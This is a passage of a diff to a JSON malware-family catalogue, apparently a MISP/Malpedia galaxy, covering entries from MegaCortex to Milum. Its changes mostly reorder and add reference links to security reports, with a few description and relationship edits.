- "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks",
"https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
"https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks"
+ "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://blog.malwarebytes.com/detections/ransom-megacortex/",
+ "https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/",
+ "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/"
],
"synonyms": [],
"type": []
@@ -31471,6 +33187,20 @@
"uuid": "3f09884e-dddc-4513-8720-a28fe21ab9a8",
"value": "MegaCortex"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacreep",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "394ddd91-b673-4607-b253-fe19b98008b5",
+ "value": "MegaCreep"
+ },
{
"description": "Megumin Trojan, is a malware focused on multiple fields (DDoS, Miner, Loader, Clipper).",
"meta": {
@@ -31490,15 +33220,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
- "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
- "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/",
- "https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/",
- "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/",
"https://twitter.com/hpsecurity/status/1509185858146082816",
- "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/"
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
+ "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
+ "https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/",
+ "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/",
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
+ "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/"
],
"synonyms": [],
"type": []
@@ -31537,8 +33267,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mercurialgrabber",
- "https://github.com/NightfallGT/Mercurial-Grabber",
- "https://twitter.com/Arkbird_SOLG/status/1432127748001128459"
+ "https://twitter.com/Arkbird_SOLG/status/1432127748001128459",
+ "https://github.com/NightfallGT/Mercurial-Grabber"
],
"synonyms": [],
"type": []
@@ -31551,9 +33281,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin",
- "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html",
"https://github.com/Ne0nd0g/merlin",
- "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html"
+ "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html"
],
"synonyms": [],
"type": []
@@ -31566,37 +33297,37 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza",
- "https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/",
- "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/",
- "https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/",
- "https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf",
- "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html",
+ "https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf",
"http://www.secureworks.com/research/threat-profiles/gold-burlap",
- "https://www.ic3.gov/Media/News/2021/210316.pdf",
- "https://twitter.com/campuscodi/status/1347223969984897026",
- "https://twitter.com/inversecos/status/1456486725664993287",
- "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
"https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html",
- "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware",
+ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://twitter.com/inversecos/status/1456486725664993287",
+ "https://www.ic3.gov/Media/News/2021/210316.pdf",
+ "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html",
"https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/",
- "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/"
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://twitter.com/campuscodi/status/1347223969984897026",
+ "https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
+ "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat",
+ "https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/",
+ "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/",
+ "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf",
+ "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/"
],
"synonyms": [
"pysa"
@@ -31626,15 +33357,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.metaljack",
- "https://www.youtube.com/watch?v=ftjDH65kw6E",
- "https://s.tencent.com/research/report/944.html",
- "https://m.threatbook.cn/detail/2527",
- "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf",
- "https://www.secrss.com/articles/17900",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
"https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/",
- "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html"
+ "https://www.secrss.com/articles/17900",
+ "https://www.youtube.com/watch?v=ftjDH65kw6E",
+ "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/",
+ "https://m.threatbook.cn/detail/2527",
+ "https://s.tencent.com/research/report/944.html"
],
"synonyms": [
"denesRAT"
@@ -31649,17 +33380,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo",
- "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
"https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html",
- "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
- "https://cofense.com/blog/autohotkey-banking-trojan/",
- "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html",
- "https://blog.ensilo.com/metamorfo-avast-abuser",
"https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
- "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md",
+ "https://twitter.com/MsftSecIntel/status/1418706916922986504",
"https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf",
- "https://twitter.com/MsftSecIntel/status/1418706916922986504"
+ "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md",
+ "https://blog.ensilo.com/metamorfo-avast-abuser",
+ "https://cofense.com/blog/autohotkey-banking-trojan/",
+ "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html"
],
"synonyms": [
"Casbaneiro"
@@ -31670,13 +33401,16 @@
"value": "Metamorfo"
},
{
- "description": "",
+ "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META – a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer",
+ "https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/",
+ "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web",
"https://ke-la.com/information-stealers-a-new-landscape/",
"https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/"
+ "https://research.nccgroup.com/2022/05/20/metastealer-filling-the-racoon-void/",
+ "https://medium.com/walmartglobaltech/metastealer-string-decryption-and-dga-overview-5f38f76830cd"
],
"synonyms": [],
"type": []
@@ -31689,11 +33423,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.meteor",
- "https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/",
- "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/",
"https://twitter.com/_cpresearch_/status/1541753913732366338",
- "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/"
+ "https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/"
],
"synonyms": [],
"type": []
@@ -31706,36 +33441,43 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter",
- "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://explore.group-ib.com/htct/hi-tech_crime_2018",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
- "https://redcanary.com/blog/getsystem-offsec/",
- "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea",
- "https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence",
- "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
- "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
- "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
- "http://www.secureworks.com/research/threat-profiles/gold-winter",
- "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
- "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
- "https://blog.morphisec.com/fin7-attacks-restaurant-industry",
"https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/",
- "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
- "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
- "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a",
+ "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea",
"http://schierlm.users.sourceforge.net/avevasion.html",
- "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-franklin",
+ "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
"https://asec.ahnlab.com/ko/26705/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a"
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "http://www.secureworks.com/research/threat-profiles/gold-franklin",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
+ "https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://blog.morphisec.com/fin7-attacks-restaurant-industry",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter",
+ "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/",
+ "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
+ "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
+ "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
+ "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
+ "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux",
+ "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/",
+ "https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
+ "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/"
],
"synonyms": [],
"type": []
@@ -31748,10 +33490,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mevade",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/",
- "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
"https://blog.fox-it.com/2013/09/05/large-botnet-cause-of-recent-tor-network-overload/",
- "https://www.youtube.com/watch?v=FttiysUZmDw"
+ "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/"
],
"synonyms": [
"SBC",
@@ -31779,10 +33521,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot",
+ "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
+ "https://twitter.com/GossiTheDog/status/1438500100238577670",
+ "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/",
"https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf",
"https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware",
- "https://twitter.com/GossiTheDog/status/1438500100238577670",
- "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
"https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s"
],
"synonyms": [
@@ -31824,15 +33567,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor",
- "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
- "https://github.com/cr4sh/microbackdoor",
- "https://cert.gov.ua/article/37626",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://ti.qianxin.com/blog/articles/Analysis-of-attack-activities-of-suspected-aptorganization-unc1151-against-ukraine-and-other-countries/",
- "https://attackiq.com/2022/04/29/attack-graph-response-to-unc1151-continued-targeting-of-ukraine/",
"https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
- "https://cluster25.io/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine/"
+ "https://github.com/cr4sh/microbackdoor",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://attackiq.com/2022/04/29/attack-graph-response-to-unc1151-continued-targeting-of-ukraine/",
+ "https://cluster25.io/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine/",
+ "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
+ "https://cert.gov.ua/article/37626",
+ "https://ti.qianxin.com/blog/articles/Analysis-of-attack-activities-of-suspected-aptorganization-unc1151-against-ukraine-and-other-countries/"
],
"synonyms": [],
"type": []
@@ -31846,32 +33589,23 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin",
"https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
- "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
- "https://github.com/dlegezo/common",
- "https://securelist.com/microcin-is-here/97353/",
+ "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636",
"https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://securelist.com/microcin-is-here/97353/",
"https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf",
+ "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia",
+ "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
"https://securelist.com/microcin-is-here/97353",
- "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636"
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
+ "https://github.com/dlegezo/common"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7d17dabf-a68e-4eda-a18f-26868ced8e73",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa",
"value": "Microcin"
},
@@ -31880,12 +33614,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia",
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
"https://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html",
- "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf",
- "http://blog.talosintelligence.com/2017/06/palestine-delphi.html",
"https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md",
+ "http://blog.talosintelligence.com/2017/06/palestine-delphi.html",
"https://research.checkpoint.com/apt-attack-middle-east-big-bang/",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks",
+ "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf"
],
"synonyms": [],
"type": []
@@ -31899,8 +33634,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.midas",
"https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants",
- "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/",
- "https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/"
+ "https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/",
+ "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/"
],
"synonyms": [],
"type": []
@@ -31953,9 +33688,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.milum",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
"https://securelist.com/wildpressure-targets-macos/103072/",
- "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/"
+ "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/",
